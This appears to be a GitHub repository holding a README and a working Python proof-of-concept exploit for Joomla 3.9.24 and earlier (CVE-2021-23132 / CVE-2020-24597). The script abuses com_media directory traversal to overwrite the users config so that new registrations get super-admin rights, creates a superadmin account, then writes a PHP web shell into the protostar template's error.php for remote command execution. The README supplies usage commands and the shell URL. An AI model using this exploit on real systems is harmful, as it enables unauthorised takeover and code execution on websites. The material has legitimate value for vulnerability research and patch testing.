├── README.md
└── cve-2021-23132.py


/README.md:
--------------------------------------------------------------------------------
 1 | # CVE-2021-23132
 2 | com_media allowed paths that are not intended for image uploads to RCE.
 3 | 
 4 | # CVE-2020-24597
 5 | Directory traversal in com_media to RCE
 6 | 
 7 | Two CVEs are the same.
 8 | 
 9 | PoC (Full)
10 | 
11 | Affected version: Joomla core <=3.9.24
12 | 
13 | User requirement: Admin account (Not Superadmin)
14 | 
15 | Gain access: Create superadmin, then trigger RCE.
16 | 
17 | Remote Code Execution (RCE) in Joomla
18 | 
19 | Run `cve-2021-23132.py` with your credentials and access link rce:
20 | 
21 | `http://target/templates/protostar/error.php?cmd=ls `
22 | 
23 | PoC:
24 |  ```
25 |  python3 cve-2021-23132.py -url http://192.168.72.140 -u admin -p 1234  -rce 1 -cmd ls
26 |  ```
27 | 
28 | ![image](https://user-images.githubusercontent.com/24661746/109748558-a898c200-7c0b-11eb-865f-ed903f23b4d9.png)
29 | 
30 | I wrote PoC to be able to use `Directory Traversal` or RCE mode.
31 | 
32 | I used `Directory Traversal` to trigger RCE.
33 | 
34 | You can use `python3 cve-2021-23132.py -h` to how to use PoC.
35 | 
36 | Note: Make sure you used python3 and install `lmxl` by `pip3 install lxml`
37 | 
38 | # DISCLAIMER
39 | 
40 | *Please use your research and help Joomla more secure.*
41 | 
42 | # References
43 | 
44 | https://developer.joomla.org/security-centre/846-20210306-core-com-media-allowed-paths-that-are-not-intended-for-image-uploads.html
45 | 


--------------------------------------------------------------------------------
/cve-2021-23132.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/python3
  2 | import sys
  3 | import requests
  4 | import re
  5 | import argparse
  6 | 
  7 | #proxies = {"http": "http://127.0.0.1:8080","https": "http://127.0.0.1:8080"} 
  8 | proxies={}
  9 | try:
 10 |     import lxml.html
 11 | except ImportError:
 12 |     print("module 'lxml' doesn't exist, type: pip3 install lxml")
 13 |     exit(0)
 14 | 
 15 | def writeConfigFile(filename):
 16 |     print("[+] Creating config.xml ")
 17 |     content="""<?xml version="1.0" encoding="utf-8"?>
 18 | <config>
 19 | 	<fieldset 
 20 | 		name="user_options"
 21 | 		label="COM_USERS_CONFIG_USER_OPTIONS" >
 22 | 		<field
 23 | 			name="allowUserRegistration"
 24 | 			type="radio"
 25 | 			label="COM_USERS_CONFIG_FIELD_ALLOWREGISTRATION_LABEL"
 26 | 			description="COM_USERS_CONFIG_FIELD_ALLOWREGISTRATION_DESC"
 27 | 			class="btn-group btn-group-yesno"
 28 | 			default="1"
 29 | 			>
 30 | 			<option value="1">JYES</option>
 31 | 			<option value="0">JNO</option>
 32 | 		</field>
 33 | 
 34 | 		<field
 35 | 			name="new_usertype"
 36 | 			type="usergrouplist"
 37 | 			label="COM_USERS_CONFIG_FIELD_NEW_USER_TYPE_LABEL"
 38 | 			description="COM_USERS_CONFIG_FIELD_NEW_USER_TYPE_DESC"
 39 | 			default="2"
 40 | 			checksuperusergroup="0"
 41 | 		/>
 42 | 
 43 | 		<field
 44 | 			name="guest_usergroup"
 45 | 			type="usergrouplist"
 46 | 			label="COM_USERS_CONFIG_FIELD_GUEST_USER_GROUP_LABEL"
 47 | 			description="COM_USERS_CONFIG_FIELD_GUEST_USER_GROUP_DESC"
 48 | 			default="1"
 49 | 			checksuperusergroup="0"
 50 | 		/>
 51 | 
 52 | 		<field
 53 | 			name="sendpassword"
 54 | 			type="radio"
 55 | 			label="COM_USERS_CONFIG_FIELD_SENDPASSWORD_LABEL"
 56 | 			description="COM_USERS_CONFIG_FIELD_SENDPASSWORD_DESC"
 57 | 			class="btn-group btn-group-yesno"
 58 | 			default="1"
 59 | 			>
 60 | 			<option value="1">JYES</option>
 61 | 			<option value="0">JNO</option>
 62 | 		</field>
 63 | 
 64 | 		<field
 65 | 			name="useractivation"
 66 | 			type="list"
 67 | 			label="COM_USERS_CONFIG_FIELD_USERACTIVATION_LABEL"
 68 | 			description="COM_USERS_CONFIG_FIELD_USERACTIVATION_DESC"
 69 | 			default="0"
 70 | 			>
 71 | 			<option value="0">JNONE</option>
 72 | 			<option value="1">COM_USERS_CONFIG_FIELD_USERACTIVATION_OPTION_SELFACTIVATION</option>
 73 | 			<option value="2">COM_USERS_CONFIG_FIELD_USERACTIVATION_OPTION_ADMINACTIVATION</option>
 74 | 		</field>
 75 | 
 76 | 		<field
 77 | 			name="mail_to_admin"
 78 | 			type="radio"
 79 | 			label="COM_USERS_CONFIG_FIELD_MAILTOADMIN_LABEL"
 80 | 			description="COM_USERS_CONFIG_FIELD_MAILTOADMIN_DESC"
 81 | 			class="btn-group btn-group-yesno"
 82 | 			default="0"
 83 | 			>
 84 | 			<option value="1">JYES</option>
 85 | 			<option value="0">JNO</option>
 86 | 		</field>
 87 | 
 88 | 		<field
 89 | 			name="captcha"
 90 | 			type="plugins"
 91 | 			label="COM_USERS_CONFIG_FIELD_CAPTCHA_LABEL"
 92 | 			description="COM_USERS_CONFIG_FIELD_CAPTCHA_DESC"
 93 | 			folder="captcha"
 94 | 			filter="cmd"
 95 | 			useglobal="true"
 96 | 			>
 97 | 			<option value="0">JOPTION_DO_NOT_USE</option>
 98 | 		</field>
 99 | 
100 | 		<field
101 | 			name="frontend_userparams"
102 | 			type="radio"
103 | 			label="COM_USERS_CONFIG_FIELD_FRONTEND_USERPARAMS_LABEL"
104 | 			description="COM_USERS_CONFIG_FIELD_FRONTEND_USERPARAMS_DESC"
105 | 			class="btn-group btn-group-yesno"
106 | 			default="1"
107 | 			>
108 | 			<option value="1">JSHOW</option>
109 | 			<option value="0">JHIDE</option>
110 | 		</field>
111 | 
112 | 		<field
113 | 			name="site_language"
114 | 			type="radio"
115 | 			label="COM_USERS_CONFIG_FIELD_FRONTEND_LANG_LABEL"
116 | 			description="COM_USERS_CONFIG_FIELD_FRONTEND_LANG_DESC"
117 | 			class="btn-group btn-group-yesno"
118 | 			default="0"
119 | 			showon="frontend_userparams:1"
120 | 			>
121 | 			<option value="1">JSHOW</option>
122 | 			<option value="0">JHIDE</option>
123 | 		</field>
124 | 
125 | 		<field
126 | 			name="change_login_name"
127 | 			type="radio"
128 | 			label="COM_USERS_CONFIG_FIELD_CHANGEUSERNAME_LABEL"
129 | 			description="COM_USERS_CONFIG_FIELD_CHANGEUSERNAME_DESC"
130 | 			class="btn-group btn-group-yesno"
131 | 			default="0"
132 | 			>
133 | 			<option value="1">JYES</option>
134 | 			<option value="0">JNO</option>
135 | 		</field>
136 | 
137 | 	</fieldset>
138 | 
139 | 	<fieldset
140 | 		name="domain_options"
141 | 		label="COM_USERS_CONFIG_DOMAIN_OPTIONS"
142 | 		>
143 | 
144 | 		<field
145 | 			name="domains"
146 | 			type="subform"
147 | 			label="COM_USERS_CONFIG_FIELD_DOMAINS_LABEL"
148 | 			description="COM_USERS_CONFIG_FIELD_DOMAINS_DESC"
149 | 			multiple="true"
150 | 			layout="joomla.form.field.subform.repeatable-table"
151 | 			formsource="administrator/components/com_users/models/forms/config_domain.xml"
152 | 		/>
153 | 	</fieldset>
154 | 
155 | 	<fieldset
156 | 		name="password_options"
157 | 		label="COM_USERS_CONFIG_PASSWORD_OPTIONS" >
158 | 		<field
159 | 			name="reset_count"
160 | 			type="integer"
161 | 			label="COM_USERS_CONFIG_FIELD_FRONTEND_RESET_COUNT_LABEL"
162 | 			description="COM_USERS_CONFIG_FIELD_FRONTEND_RESET_COUNT_DESC"
163 | 			first="0"
164 | 			last="20"
165 | 			step="1"
166 | 			default="10"
167 | 		/>
168 | 
169 | 		<field
170 | 			name="reset_time"
171 | 			type="integer"
172 | 			label="COM_USERS_CONFIG_FIELD_FRONTEND_RESET_TIME_LABEL"
173 | 			description="COM_USERS_CONFIG_FIELD_FRONTEND_RESET_TIME_DESC"
174 | 			first="1"
175 | 			last="24"
176 | 			step="1"
177 | 			default="1"
178 | 		/>
179 | 
180 | 		<field
181 | 			name="minimum_length"
182 | 			type="integer"
183 | 			label="COM_USERS_CONFIG_FIELD_MINIMUM_PASSWORD_LENGTH"
184 | 			description="COM_USERS_CONFIG_FIELD_MINIMUM_PASSWORD_LENGTH_DESC"
185 | 			first="4"
186 | 			last="99"
187 | 			step="1"
188 | 			default="4"
189 | 		/>
190 | 
191 | 		<field
192 | 			name="minimum_integers"
193 | 			type="integer"
194 | 			label="COM_USERS_CONFIG_FIELD_MINIMUM_INTEGERS"
195 | 			description="COM_USERS_CONFIG_FIELD_MINIMUM_INTEGERS_DESC"
196 | 			first="0"
197 | 			last="98"
198 | 			step="1"
199 | 			default="0"
200 | 		/>
201 | 
202 | 		<field
203 | 			name="minimum_symbols"
204 | 			type="integer"
205 | 			label="COM_USERS_CONFIG_FIELD_MINIMUM_SYMBOLS"
206 | 			description="COM_USERS_CONFIG_FIELD_MINIMUM_SYMBOLS_DESC"
207 | 			first="0"
208 | 			last="98"
209 | 			step="1"
210 | 			default="0"
211 | 		/>
212 | 
213 | 		<field
214 | 			name="minimum_uppercase"
215 | 			type="integer"
216 | 			label="COM_USERS_CONFIG_FIELD_MINIMUM_UPPERCASE"
217 | 			description="COM_USERS_CONFIG_FIELD_MINIMUM_UPPERCASE_DESC"
218 | 			first="0"
219 | 			last="98"
220 | 			step="1"
221 | 			default="0"
222 | 		/>
223 | 
224 | 		<field
225 | 			name="minimum_lowercase"
226 | 			type="integer"
227 | 			label="COM_USERS_CONFIG_FIELD_MINIMUM_LOWERCASE"
228 | 			description="COM_USERS_CONFIG_FIELD_MINIMUM_LOWERCASE_DESC"
229 | 			first="0"
230 | 			last="98"
231 | 			step="1"
232 | 			default="0"
233 | 		/>
234 | 
235 | 	</fieldset>
236 | 
237 | 	<fieldset
238 | 		name="user_notes_history"
239 | 		label="COM_USERS_CONFIG_FIELD_NOTES_HISTORY" >
240 | 
241 | 		<field
242 | 			name="save_history"
243 | 			type="radio"
244 | 			label="JGLOBAL_SAVE_HISTORY_OPTIONS_LABEL"
245 | 			description="JGLOBAL_SAVE_HISTORY_OPTIONS_DESC"
246 | 			class="btn-group btn-group-yesno"
247 | 			default="0"
248 | 			>
249 | 			<option value="1">JYES</option>
250 | 			<option value="0">JNO</option>
251 | 		</field>
252 | 
253 | 		<field
254 | 			name="history_limit"
255 | 			type="number"
256 | 			label="JGLOBAL_HISTORY_LIMIT_OPTIONS_LABEL"
257 | 			description="JGLOBAL_HISTORY_LIMIT_OPTIONS_DESC"
258 | 			filter="integer"
259 | 			default="5"
260 | 			showon="save_history:1"
261 | 		/>
262 | 
263 | 	</fieldset>
264 | 
265 |  	<fieldset
266 | 		name="massmail"
267 | 		label="COM_USERS_MASS_MAIL"
268 | 		description="COM_USERS_MASS_MAIL_DESC">
269 | 
270 | 		<field
271 |  			name="mailSubjectPrefix"
272 |  			type="text"
273 | 			label="COM_USERS_CONFIG_FIELD_SUBJECT_PREFIX_LABEL"
274 | 			description="COM_USERS_CONFIG_FIELD_SUBJECT_PREFIX_DESC"
275 | 		/>
276 | 
277 |  		<field
278 |  			name="mailBodySuffix"
279 | 			type="textarea"
280 | 			label="COM_USERS_CONFIG_FIELD_MAILBODY_SUFFIX_LABEL"
281 | 			description="COM_USERS_CONFIG_FIELD_MAILBODY_SUFFIX_DESC"
282 |  			rows="5"
283 |  			cols="30"
284 | 		/>
285 | 
286 | 	</fieldset>
287 | 
288 | 	<fieldset
289 | 		name="debug"
290 | 		label="COM_USERS_DEBUG_LABEL"
291 | 		description="COM_USERS_DEBUG_DESC">
292 | 
293 | 		<field
294 | 			name="debugUsers"
295 | 			type="radio"
296 | 			label="COM_USERS_DEBUG_USERS_LABEL"
297 | 			description="COM_USERS_DEBUG_USERS_DESC"
298 | 			class="btn-group btn-group-yesno"
299 | 			default="1"
300 | 			>
301 | 			<option value="1">JYES</option>
302 | 			<option value="0">JNO</option>
303 | 		</field>
304 | 
305 | 		<field
306 | 			name="debugGroups"
307 | 			type="radio"
308 | 			label="COM_USERS_DEBUG_GROUPS_LABEL"
309 | 			description="COM_USERS_DEBUG_GROUPS_DESC"
310 | 			class="btn-group btn-group-yesno"
311 | 			default="1"
312 | 			>
313 | 			<option value="1">JYES</option>
314 | 			<option value="0">JNO</option>
315 | 		</field>
316 | 
317 | 	</fieldset>
318 | 
319 | 	<fieldset name="integration"
320 | 		label="JGLOBAL_INTEGRATION_LABEL"
321 | 		description="COM_USERS_CONFIG_INTEGRATION_SETTINGS_DESC"
322 | 	>
323 | 
324 | 		<field
325 | 			name="integration_sef"
326 | 			type="note"
327 | 			label="JGLOBAL_SEF_TITLE"
328 | 		/>
329 | 
330 | 		<field
331 | 			name="sef_advanced"
332 | 			type="radio"
333 | 			class="btn-group btn-group-yesno btn-group-reversed"
334 | 			default="0"
335 | 			label="JGLOBAL_SEF_ADVANCED_LABEL"
336 | 			description="JGLOBAL_SEF_ADVANCED_DESC"
337 | 			filter="integer"
338 | 			>
339 | 			<option value="0">JGLOBAL_SEF_ADVANCED_LEGACY</option>
340 | 			<option value="1">JGLOBAL_SEF_ADVANCED_MODERN</option>
341 | 		</field>
342 | 
343 | 		<field
344 | 			name="integration_customfields"
345 | 			type="note"
346 | 			label="JGLOBAL_FIELDS_TITLE"
347 | 		/>
348 | 
349 | 		<field
350 | 			name="custom_fields_enable"
351 | 			type="radio"
352 | 			label="JGLOBAL_CUSTOM_FIELDS_ENABLE_LABEL"
353 | 			description="JGLOBAL_CUSTOM_FIELDS_ENABLE_DESC"
354 | 			class="btn-group btn-group-yesno"
355 | 			default="1"
356 | 			>
357 | 			<option value="1">JYES</option>
358 | 			<option value="0">JNO</option>
359 | 		</field>
360 | 
361 | 	</fieldset>
362 | 
363 | 	<fieldset
364 | 		name="permissions"
365 | 		label="JCONFIG_PERMISSIONS_LABEL"
366 | 		description="JCONFIG_PERMISSIONS_DESC"
367 | 		>
368 | 
369 | 		<field
370 | 			name="rules"
371 | 			type="rules"
372 | 			label="JCONFIG_PERMISSIONS_LABEL"
373 | 			filter="rules"
374 | 			validate="rules"
375 | 			component="com_users"
376 | 			section="component"
377 | 		/>
378 | 
379 | 	</fieldset>
380 | </config>
381 | """
382 |     f = open(filename, "w")
383 |     f.write(content)
384 |     f.close
385 | 
386 | def extract_token(resp):
387 |     match = re.search(r'name="([a-f0-9]{32})" value="1"', resp.text, re.S)
388 |     if match is None:
389 |         print("[-] Cannot find CSRF token!\n")
390 |         return None
391 |     return match.group(1)
392 | 
393 | 
394 | def try_admin_login(sess, url, uname, upass):
395 |     admin_url = url + '/administrator/index.php'
396 |     print('[+] Getting token for Manager login')
397 |     resp = sess.get(admin_url, verify=True)
398 |     token = extract_token(resp)
399 |     if not token:
400 |         return False
401 |     print('[+] Logging in to Admin')
402 |     data = {
403 |         'username': uname,
404 |         'passwd': upass,
405 |         'task': 'login',
406 |         token: '1'
407 |     }
408 |     resp = sess.post(admin_url, data=data, verify=True)
409 |     if 'task=profile.edit' not in resp.text:
410 |         print('[!] Admin Login Failure!')
411 |         return None
412 |     print('[+] Admin Login Successfully!')
413 |     return True
414 | 
415 | 
416 | def check_admin(sess, url):
417 |     url_check = url + '/administrator/index.php?option=com_config&view=component&component=com_media&path='
418 |     resp = sess.get(url_check, verify=True)
419 |     token = extract_token(resp)
420 |     if not token:
421 |         print ("[-] You are not admin account!")
422 |         sys.exit()
423 |     return token
424 | 
425 | 
426 | def set_media_options(url, sess, dir, token):
427 |     print("[+] Setting media options")
428 |     newdata = {
429 |         'jform[upload_extensions]': 'xml,bmp,csv,doc,gif,ico,jpg,jpeg,odg,odp,ods,odt,pdf,png,ppt,swf,txt,xcf,xls,BMP,CSV,DOC,GIF,ICO,JPG,JPEG,ODG,ODP,ODS,ODT,PDF,PNG,PPT,SWF,TXT,XCF,XLS',
430 |         'jform[upload_maxsize]': 10,
431 |         'jform[file_path]': dir,
432 |         'jform[image_path]': dir,
433 |         'jform[restrict_uploads]': 0,
434 |         'jform[check_mime]': 0,
435 |         'jform[image_extensions]': 'bmp,gif,jpg,png',
436 |         'jform[ignore_extensions]': '',
437 |         'jform[upload_mime]': 'image/jpeg,image/gif,image/png,image/bmp,application/x-shockwave-flash,application/msword,application/excel,application/pdf,application/powerpoint,text/plain,application/x-zip',
438 |         'jform[upload_mime_illegal]': 'text/html',
439 |         'id': 13,
440 |         'component': 'com_media',
441 |         'task': 'config.save.component.apply',
442 |         token: 1
443 |     }
444 |     newdata['task'] = 'config.save.component.apply'
445 |     config_url = url + '/administrator/index.php?option=com_config'
446 |     resp = sess.post(config_url, data=newdata, verify=True)
447 |     if 'jform[upload_extensions]' not in resp.text:
448 |         print('[!] Maybe failed to set media options...')
449 |         return False
450 |     return True
451 | 
452 | 
453 | def traversal(sess, url):
454 |     shell_url = url + '/administrator/index.php?option=com_media&view=mediaList&tmpl=component&folder='
455 |     resp = sess.get(shell_url, verify=True)
456 |     page = resp.text.encode('utf-8')
457 |     html = lxml.html.fromstring(page)
458 |     files = html.xpath("//input[@name='rm[]']/@value")
459 |     for file in files:
460 |         print (file)
461 |     pass
462 | 
463 | 
464 | def removeFile(sess, url, filename, token):
465 |     remove_path = url + '/administrator/index.php?option=com_media&task=file.delete&tmpl=index&' + token + '=1&folder=&rm[]=' + filename
466 |     msg = sess.get(remove_path, verify=True,proxies=proxies)
467 |     page = msg.text.encode('utf-8')
468 |     html = lxml.html.fromstring(page)
469 |     file_remove = html.xpath("//div[@class='alert-message']/text()[1]")
470 |     print ('\n' + '[Result]: ' + file_remove[-1])
471 | 
472 | 
473 | def upload_file(sess, url, file, token):
474 |     print("[+] Uploading config.xml")
475 |     filename = "config.xml"
476 |     url = url + '/administrator/index.php?option=com_media&task=file.upload&tmpl=component&' + token + '=1&format=html&folder='
477 |     files = {
478 |         'Filedata[]': (filename, file, 'text/xml')
479 |     }
480 |     data = dict(folder="")
481 |     resp = sess.post(url, files=files, data=data, verify=True,proxies=proxies)
482 |     if filename not in resp.text:
483 |         print("[!] Failed to upload file!")
484 |         return False
485 |     print("[+] Exploit Successfully!")
486 |     return True
487 | 
488 | 
489 | def set_users_option(sess, url, token):
490 |     newdata = {
491 |         'jform[allowUserRegistration]': 1,
492 |         'jform[new_usertype]': 8,
493 |         'jform[guest_usergroup]': 8,
494 |         'jform[sendpassword] ': 0,
495 |         'jform[useractivation]': 0,
496 |         'jform[mail_to_admin]': 0,
497 |         'id': 25,
498 |         'component': 'com_users',
499 |         'task': 'config.save.component.apply',
500 |         token: 1
501 |     }
502 |     newdata['task'] = 'config.save.component.apply'
503 |     config_url = url + '/administrator/index.php?option=com_config'
504 |     resp = sess.post(config_url, data=newdata, verify=True)
505 |     if 'Configuration saved.' not in resp.text:
506 |         print('[!] Could not save data. Error: Save not permitted.')
507 |         return False
508 |     return True
509 | 
510 | 
511 | def create_superuser(sess, url, username, password, email):
512 |     resp = sess.get(url + "/index.php?option=com_users&view=registration", verify=True)
513 |     token = extract_token(resp)
514 |     data = {
515 |         # Form data
516 |         'jform[name]': username,
517 |         'jform[username]': username,
518 |         'jform[password1]': password,
519 |         'jform[password2]': password,
520 |         'jform[email1]': email,
521 |         'jform[email2]': email,
522 |         'jform[option]': 'com_users',
523 |         'jform[task]': 'registration.register',
524 |         token: '1',
525 |     }
526 |     url_post = "/index.php/component/users/?task=registration.register&Itemid=101"
527 |     sess.post(url + url_post, data=data, verify=True)
528 |     sess.get(url + "/administrator/index.php?option=com_login&task=logout&" + token + "=1", verify=True)
529 |     newsess = requests.Session()
530 |     if try_admin_login(newsess, url, username, password):
531 |         print ("[+] Now, you are super-admin!!!!!!!!!!!!!!!!" + "\n[+] Your super-admin account: \n[+] USERNAME: " + username + "\n[+] PASSWORD: " + password)
532 |         return newsess
533 |     else:
534 |         print ("[-] Sorry,exploit fail!")
535 |     return None
536 | 
537 | 
538 | def setOption(url, sess, usuper, psuper, esuper, token):
539 |     print ("Superadmin Creation:")
540 |     #  folder contains config.xml
541 |     dir = './administrator/components/com_users'
542 |     filename = 'config.xml'
543 |     set_media_options(url, sess, dir, token)
544 |     traversal(sess, url)
545 |     removeFile(sess, url, filename, token)
546 |     f = open("config.xml", "rb")
547 |     upload_file(sess, url, f, token)
548 |     set_users_option(sess, url, token)
549 | 
550 | def rce(sess, url, cmd, token):
551 |     filename = 'error.php'
552 |     shlink = url + '/administrator/index.php?option=com_templates&view=template&id=506&file=506&file=L2Vycm9yLnBocA%3D%3D'
553 |     shdata_up = {
554 |         'jform[source]': "<?php echo 'Hacked by HK\n' ;system($_GET['cmd']); ?>",
555 |         'task': 'template.apply',
556 |         token: '1',
557 |         'jform[extension_id]': '506',
558 |         'jform[filename]': '/' + filename
559 |     }
560 |     sess.post(shlink, data=shdata_up,proxies=proxies)
561 |     path2shell = '/templates/protostar/error.php?cmd=' + cmd
562 |     # print '[+] Shell is ready to use: ' + str(path2shell)
563 |     print ('[+] Checking:')
564 |     shreq = sess.get(url + path2shell,proxies=proxies)
565 |     shresp = shreq.text
566 |     print (shresp + '[+] Shell link: \n' + (url + path2shell))
567 |     print ('[+] Module finished.')
568 | 
569 | 
570 | def main():
571 |     # Construct the argument parser
572 |     ap = argparse.ArgumentParser()
573 |     # Add the arguments to the parser
574 |     ap.add_argument("-url", "--url", required=True,
575 |                     help=" URL for your Joomla target")
576 |     ap.add_argument("-u", "--username", required=True,
577 |                     help="username")
578 |     ap.add_argument("-p", "--password", required=True,
579 |                     help="password")
580 |     ap.add_argument("-dir", "--directory", required=False, default='./',
581 |                     help="directory")
582 |     ap.add_argument("-rm", "--remove", required=False,
583 |                     help="filename")
584 |     ap.add_argument("-rce", "--rce", required=False, default="0",
585 |                     help="RCE's mode is 1 to turn on")
586 |     ap.add_argument("-cmd", "--command", default="whoami",
587 |                     help="command")
588 |     ap.add_argument("-usuper", "--usernamesuper", default="hk",
589 |                     help="Super's username")
590 |     ap.add_argument("-psuper", "--passwordsuper", default="12345678",
591 |                     help="Super's password")
592 |     ap.add_argument("-esuper", "--emailsuper", default="hk@hk.com",
593 |                     help="Super's Email")
594 |     args = vars(ap.parse_args())
595 |     # target
596 |     url = format(str(args['url']))
597 |     print ('[+] Your target: ' + url)
598 |     # username
599 |     uname = format(str(args['username']))
600 |     # password
601 |     upass = format(str(args['password']))
602 |     # directory
603 |     dir = format(str(args['directory']))
604 |     # init
605 |     sess = requests.Session()
606 |     # admin login
607 |     if (try_admin_login(sess, url, uname, upass) == None): sys.exit()
608 |     # get token
609 |     token = check_admin(sess, url)
610 |     # set options
611 |     set_media_options(url, sess, dir, token)
612 |     print ("Directory mode:")
613 |     traversal(sess, url)
614 |     if ap.parse_args().remove:
615 |         print ("\nRemove file mode: ")
616 |         filename = format(str(args['remove']))
617 |         removeFile(sess, url, filename, token)
618 |     # check option superadmin creation
619 |     # username of superadmin
620 |     usuper = format(str(args['usernamesuper']))
621 |     # password of superadmin
622 |     psuper = format(str(args['passwordsuper']))
623 |     # email of superadmin
624 |     esuper = format(str(args['emailsuper']))
625 |     # RCE mode
626 |     if (format(str(args['rce'])) == "1"):
627 |         print ("\nRCE mode:\n")
628 |         # command
629 |         filename="config.xml"
630 |         writeConfigFile(filename)
631 |         command = format(str(args['command']))
632 |         setOption(url, sess, usuper, psuper, esuper, token)
633 |          # superadmin creation
634 |         newsess = create_superuser(sess, url, usuper, psuper, esuper)
635 |         if newsess != None :
636 |             # get token
637 |             newtoken = check_admin(newsess, url)
638 |             rce(newsess, url, command, newtoken)
639 | 
640 | if __name__ == "__main__":
641 |     sys.exit(main())
642 | 


--------------------------------------------------------------------------------